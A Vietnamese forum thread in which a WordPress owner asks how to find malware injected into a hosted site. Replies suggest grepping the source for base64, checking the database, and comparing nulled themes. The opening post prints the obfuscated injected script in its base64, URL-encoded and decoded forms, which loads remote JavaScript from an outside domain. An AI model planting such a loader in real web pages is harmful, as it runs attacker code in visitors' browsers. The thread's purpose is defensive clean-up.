Tình hình là có 1 con web sử dụng wordpress, hiện giờ nó bị dính con virut này Mã khi viewsource <script src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCUzYSUyZiUyZiU2YiU2NSU2OSU3NCUyZSU3MyU3NCU2MSU3NCU2OSU2MyU3NyU2NSU2MiUyZSU3NCU2YiUyZiU3NCUzNiU2ZCU2MyU2ZSUzMSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZScpKTs="></script> Decode <script>document.write(unescape('%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%6b%65%69%74%2e%73%74%61%74%69%63%77%65%62%2e%74%6b%2f%74%36%6d%63%6e%31%22%3e%3c%2f%73%63%72%69%70%74%3e'));</script> Decode phát nữa thì ra <script src="http://keit.staticweb.tk/t6mcn1"></script> Các bạn có cách nào check và tìm ra mã độc này không, mình ko thạo wp lắm lên mò mãi chưa ra chạy trên local thì ko thấy cái mã base64 đâu cả. trên hosting thì mới có
Down hết source về, xong dùng notepad++ find in file toàn bộ folder code. Với keyword là base64 thử xem
Thím quăng code site lên đây ae check xem. Mà coi chừng nó nằm trong db nữa đấy. Nén DB quăng lên luôn đây đê
em thường hay vầy chia sẻ xem có bác nào giống em không. Các theme tải nulled trên mạng về, em tải 3-4 nguồn khác nhau. Rồi giải nén, dùng winmerge để compare. Sẽ lòi ra rất nhiều bác chèn code ngầm, code bậy bạ vào. Từ đó em remove ra. cho sạch
Mình thử cái này rồi nhưng ko tìm thấy, nó ko có plugin đấy ko biết nó dấu ở đâu wp thì ko thạo kể cũng mệt phết thôi đành vậy
